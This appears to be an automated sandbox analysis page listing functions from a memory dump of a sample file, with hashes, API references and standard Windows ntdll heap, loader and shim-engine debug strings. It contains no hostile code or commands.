Opcode ID: cabe086e8183d9b3b171b4fa236741beb66b66e3caf8fa7e4aa623babc191c72
Instruction ID: 812e4829ed0211e6a754690f15f2b1de98171c74cce73d986ee4a82497f96b93
Opcode Fuzzy Hash: cabe086e8183d9b3b171b4fa236741beb66b66e3caf8fa7e4aa623babc191c72
Instruction Fuzzy Hash: C0D11239904685EFCB12CFA8C490AAEBBF6FF4A710F048A4DE4459B352D735A985DF10

Uniqueness

Uniqueness Score: -1.00%

Function 1E8EDA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E92F41B

Strings

HEAP[%wZ]: , xrefs: 1E92F444
RtlUnlockHeap, xrefs: 1E92F467
, passed to %s, xrefs: 1E92F46C
Invalid heap signature for heap at %p, xrefs: 1E92F45D
HEAP: , xrefs: 1E92F451

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 557d78c181ac45487b84f557548674ddcf0f8bdb5ff4548cd2927773c7acff46
Instruction ID: 6e871eec676cd83dad7956fbe2f10f15a861e5998667847421b181f519f39de8
Opcode Fuzzy Hash: 557d78c181ac45487b84f557548674ddcf0f8bdb5ff4548cd2927773c7acff46
Instruction Fuzzy Hash: E6412931D14686EFDB22DF68C894B9AB3A9EF42314F004B6DD406677C5C778A984CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1E8EDAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E92F561

Strings

HEAP[%wZ]: , xrefs: 1E92F58A
, passed to %s, xrefs: 1E92F5B2
Invalid heap signature for heap at %p, xrefs: 1E92F5A3
RtlLockHeap, xrefs: 1E92F5AD
HEAP: , xrefs: 1E92F597

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 347d704be55f6460ef29cb0cb275689b6a6170506fd424844f61f1062ad29f08
Instruction ID: ae392bc9c4905dbff404ee754806cbb36cb8b576f74d8a4709852a07a2a9688a
Opcode Fuzzy Hash: 347d704be55f6460ef29cb0cb275689b6a6170506fd424844f61f1062ad29f08
Instruction Fuzzy Hash: 8A312135514AC8EFEB22CF38C859F9A77E9EF42710F004B98E40297B91D769A984CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F4C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8F4C84

Strings

LdrpFindDllActivationContext, xrefs: 1E933440, 1E93346C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E933439
minkernel\ntdll\ldrsnap.c, xrefs: 1E93344A, 1E933476
Querying the active activation context failed with status 0x%08lx, xrefs: 1E933466

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: b6a5710bf1b1c5b8c75e64042f21a2b9225cd67ac1ba2025a132e959a5aeaed2
Instruction ID: d9fe392cb08c0aa9f51a64db782023f14b256274e4f63a828750f34bf80d5f5b
Opcode Fuzzy Hash: b6a5710bf1b1c5b8c75e64042f21a2b9225cd67ac1ba2025a132e959a5aeaed2
Instruction Fuzzy Hash: C0312672E04296EFDB11DB1C8894E5AB2A6FF41354F12932BE845573D0E7B09D80C791

Uniqueness

Uniqueness Score: -1.00%

Function 1E8D0680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 1E924EBB
(UCRBlock->Size >= *Size), xrefs: 1E924ED7
HEAP: , xrefs: 1E924ECA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 715d5987ff5cd6c6d7a61c3de7904ee9af055523c8f92b109b53f60cf098afdc
Instruction ID: 5a0e7e35e886deed81eff555edcc793f4d2dd868f02135df4409e0735353355b
Opcode Fuzzy Hash: 715d5987ff5cd6c6d7a61c3de7904ee9af055523c8f92b109b53f60cf098afdc
Instruction Fuzzy Hash: E5F1BB74A00646DFDB05CF69C890FAAB7B6FF84340F1086A9E4169B385D770E986CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E0AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8E0BFC

Strings

Failed to allocated memory for shimmed module list, xrefs: 1E929F1C
minkernel\ntdll\ldrinit.c, xrefs: 1E929F2E
LdrpCheckModule, xrefs: 1E929F24

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 4454b554bbdbf199896ee0b0b534366f6b3a92c6498201a5178e4c888ec77912
Instruction ID: cbf62561367d4cd84e7a2d48c57208f7abc4e90c030ca46d6509a0503daed7be
Opcode Fuzzy Hash: 4454b554bbdbf199896ee0b0b534366f6b3a92c6498201a5178e4c888ec77912
Instruction Fuzzy Hash: 2071E374A00246DFCB05DFA8C890AAEB7F5FF85308F584A6DE801E7655E770AD42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1E99ACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E99AEA9
RtlDebugPrintTimes.NTDLL ref: 1E99B185

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 53f7a7f7eecdf867f1971ed4f66323c61b37fa1583b63aa3ed02e8006c798dd4
Instruction ID: 092d43fe143883a121b927e374a626dfd11ac628500905f76195623e22a44596
Opcode Fuzzy Hash: 53f7a7f7eecdf867f1971ed4f66323c61b37fa1583b63aa3ed02e8006c798dd4
Instruction Fuzzy Hash: 7AF1F672E006518FCF19CFA9C9A067DBBF6EF8820071A426DD456DB384E678E941DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E8EEE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e3e686be8c1f9f663a33c64b4887fa3079322b8ef6575134f73da13fbfee74
Instruction ID: 50e296c00b209b5f943c2bdddf16741720900a6fddb2445bd0eb91ff0704fda4
Opcode Fuzzy Hash: c9e3e686be8c1f9f663a33c64b4887fa3079322b8ef6575134f73da13fbfee74
Instruction Fuzzy Hash: C1E10375E00749DFCB25CFA9C980A9DBBF6FF49310F10466AE446A7A64D731A980CF10

Uniqueness

Uniqueness Score: -1.00%

Function 1E99A1F0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E99A25D
RtlDebugPrintTimes.NTDLL ref: 1E99A2F1
RtlDebugPrintTimes.NTDLL ref: 1E99A314
RtlDebugPrintTimes.NTDLL ref: 1E99A340
RtlDebugPrintTimes.NTDLL ref: 1E99A415
RtlDebugPrintTimes.NTDLL ref: 1E99A468
RtlDebugPrintTimes.NTDLL ref: 1E99A487
RtlDebugPrintTimes.NTDLL ref: 1E99A4B8

Strings

HEAP: , xrefs: 1E99A206

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 22182e1c772da6f0f9e346a426deeadcb901edeb54b222ccb69e4b8d54e74fc4
Instruction ID: 2a3769fb492648acd28f89015c6d5f00f875142ceec9aee825a248a516ce5bff
Opcode Fuzzy Hash: 22182e1c772da6f0f9e346a426deeadcb901edeb54b222ccb69e4b8d54e74fc4
Instruction Fuzzy Hash: 37A1BE71A183128FDB05CE18C894A1AB7EAFF88310F194A6DE945DB310E7B4EC45DF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F7550, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E934530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E934507
ExecuteOptions, xrefs: 1E9344AB
CLIENT(ntdll): Processing section info %ws..., xrefs: 1E934592
Execute=1, xrefs: 1E93451E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E934460
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E93454D

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: fab9ac576b09bc3b5df67bfd660facf6f548f220192dd370d00a6e479d1f6baa
Instruction ID: 7a9640222242960772f4aed3a72e4a37b0556946ba30290a25106bfeaef07a72
Opcode Fuzzy Hash: fab9ac576b09bc3b5df67bfd660facf6f548f220192dd370d00a6e479d1f6baa
Instruction Fuzzy Hash: 0251F675A10259AAFF10AAE5DC95FED73ADAF48301F100BA9E505E7280E771EE41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DA170, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E927807
SsHd, xrefs: 1E8DA304
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9277E2
RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9277DD, 1E927802
Actx , xrefs: 1E927819, 1E927880
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9278F3

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 563bfe220bf47cd813e95cf4f92d2795e38d412afcb410c408b27c7313d7e44c
Instruction ID: 70fc285f9e6c95673e75f1c4e97854aba7e80f324ab866b4441d7cfd122500cf
Opcode Fuzzy Hash: 563bfe220bf47cd813e95cf4f92d2795e38d412afcb410c408b27c7313d7e44c
Instruction Fuzzy Hash: 73E1D070A043428FDB15CE69C890B5AF7E6FF85224F204BADE865DB2D4D731D849CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DD690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E929299

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E929178
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E929372
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E929153
RtlpFindActivationContextSection_CheckParameters, xrefs: 1E92914E, 1E929173
GsHd, xrefs: 1E8DD794
Actx , xrefs: 1E929315

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: f7044bc4fe1266e43c0ca37e84f501c7f82fa3c5344647e9fe7aff3301d8a4ae
Instruction ID: 7b4a8764ac3cd4837fce9c5dd41c641726853d8fea1f3c215dcc502d1698b3ce
Opcode Fuzzy Hash: f7044bc4fe1266e43c0ca37e84f501c7f82fa3c5344647e9fe7aff3301d8a4ae
Instruction Fuzzy Hash: 09E1B070A043469FDB11CF25C880B5AB7E6BF88354F444B6DE8959B2C5D731E848CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1E96F0A5, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E96F0D6

Strings

RtlAllocateHeap, xrefs: 1E96F0ED
Just allocated block at %p for %Ix bytes, xrefs: 1E96F288
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1E96F389
HEAP[%wZ]: , xrefs: 1E96F267, 1E96F314, 1E96F36B
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 1E96F33E
HEAP: , xrefs: 1E96F274, 1E96F321, 1E96F378

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 18b384e33127fca0262353fb4e974bf0ec5efd455c748d8a10ec7a34768bd636
Instruction ID: 20c838145513a14cddcf383b019a25015a255996720888be889947b0205840f4
Opcode Fuzzy Hash: 18b384e33127fca0262353fb4e974bf0ec5efd455c748d8a10ec7a34768bd636
Instruction Fuzzy Hash: B191FF39904685DFDB02CFA8C490A9EBBF6FF49350F448A5EE841AB761D735A980DF10

Uniqueness

Uniqueness Score: -1.00%

Function 1E8B640D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8B651C

Part of subcall function 1E8B6565: RtlDebugPrintTimes.NTDLL ref: 1E8B6614
Part of subcall function 1E8B6565: RtlDebugPrintTimes.NTDLL ref: 1E8B665F

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9197B9
apphelp.dll, xrefs: 1E8B6446
Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E919790
LdrpInitShimEngine, xrefs: 1E919783, 1E919796, 1E9197BF
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E91977C
minkernel\ntdll\ldrinit.c, xrefs: 1E9197A0, 1E9197C9

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 1f7b4fab0a3227757c5f452c6374608327441106a1eca77c81d470835762beb7
Instruction ID: f2c74e71eebb0eb6f22f4d7c00a2f4537afdc843c0e24d194068d2e780be7a87
Opcode Fuzzy Hash: 1f7b4fab0a3227757c5f452c6374608327441106a1eca77c81d470835762beb7
Instruction Fuzzy Hash: C8518B756083599FE321DF24C890E9B77E9FF84654F440B1DF9969B2A0EB30E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E93FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E93FAF3
RtlDebugPrintTimes.NTDLL ref: 1E93FB15

Strings

Unknown, xrefs: 1E93FA42, 1E93FA54
minkernel\ntdll\ldrdload.c, xrefs: 1E93FA68
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 1E93FA58
LdrpRedirectDelayloadFailure, xrefs: 1E93FA5E
$, xrefs: 1E93FABD

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 830446b66006560430c89d6907ff803921c9dc4d6ad41f9ec3f39d6690990f19
Instruction ID: e0b52fcbf4a68b940588e5a181af7de5a40e02f992a6a4e77ce8b04ec5a883ba
Opcode Fuzzy Hash: 830446b66006560430c89d6907ff803921c9dc4d6ad41f9ec3f39d6690990f19
Instruction Fuzzy Hash: 75415FB5A00219ABCB02CFA5C890ADEBBFAFF88355F240219E945A7340D7719D41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E96F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E96F92E

Strings

About to free block at %p with tag %ws, xrefs: 1E96FAFE
RtlFreeHeap, xrefs: 1E96F948, 1E96F9B2
HEAP[%wZ]: , xrefs: 1E96F9EC, 1E96FAD7
HEAP: , xrefs: 1E96F9F9, 1E96FAE4
About to free block at %p, xrefs: 1E96FA0A

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 1041464b8ee69e3bc67c5877b0a1376e5033cc2b0b8618f2c3bf296515bbb7ce
Instruction ID: 27243bccb24469c6eb4aaa66224269eddf6cd9067884a01a211fdf3f6d0af487
Opcode Fuzzy Hash: 1041464b8ee69e3bc67c5877b0a1376e5033cc2b0b8618f2c3bf296515bbb7ce
Instruction Fuzzy Hash: A971DF35904685AFCB02CFA8D4A0AAEFBF6FF89300F48865EE4459B351D731A980DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E8B6565, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8B6614
RtlDebugPrintTimes.NTDLL ref: 1E8B665F

Strings

LdrpLoadShimEngine, xrefs: 1E91984A, 1E91988B
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E919885
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E919843
minkernel\ntdll\ldrinit.c, xrefs: 1E919854, 1E919895

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 649e946b35f347ecc15bed4754ce180f79cd61598a079c33e5486e726189306a
Instruction ID: d454da1610a3bdbe58000adab8b3b6df6067a65876cb10808cbcd94d4d32b4f9
Opcode Fuzzy Hash: 649e946b35f347ecc15bed4754ce180f79cd61598a079c33e5486e726189306a
Instruction Fuzzy Hash: 9C51D375A143A89FCB14DBA8CC94EDD77BAAF81318F480769E541AF295DB70AC40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8ED6D0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8ED879

Part of subcall function 1E8C4779: RtlDebugPrintTimes.NTDLL ref: 1E8C4817

Strings

Process 0x%p (%wZ) exiting, xrefs: 1E92F0D1
LdrShutdownProcess, xrefs: 1E92F0D8
minkernel\ntdll\ldrinit.c, xrefs: 1E92F0E2
$, xrefs: 1E8ED820
$, xrefs: 1E8ED78D

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: cbff7b612a3aa7c818455c37d8f9ffe5fbb2e8e34a6a4952b4115be0a1687468
Instruction ID: a241768dc702c77564c51325a8217f04f007d0665e84f4477c91ee2b35bb2623
Opcode Fuzzy Hash: cbff7b612a3aa7c818455c37d8f9ffe5fbb2e8e34a6a4952b4115be0a1687468
Instruction Fuzzy Hash: 6E51E575A0839A9FDB04CFB8C994B8DBBB2BF86304F544759D8016B6C1D770A989CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 1E96ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E96EDD0
RtlDebugPrintTimes.NTDLL ref: 1E96EE45

Strings

Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E96EDE3
Entry Heap Size , xrefs: 1E96EDED
---------------------------------------, xrefs: 1E96EDF9
HEAP: , xrefs: 1E96ECDD

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 25a1623dacff15cf725350800febf77a2e99796edbaba1d2f799ffb8fdbe6367
Instruction ID: ba256480e3714dcdf0920962113b83609188490177b8b9311c1ff6e08324d870
Opcode Fuzzy Hash: 25a1623dacff15cf725350800febf77a2e99796edbaba1d2f799ffb8fdbe6367
Instruction Fuzzy Hash: E041AD35A10226DFCB06CF19C4D495ABBEAFF4931472586AEE4089B311E731EE42DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8C9046, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E922360

Strings

@, xrefs: 1E8C9095
$, xrefs: 1E8C90B1

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 61d22d30e81df562d6639c28a4106e546f06862c74f2bc7f2b843b922fe72db0
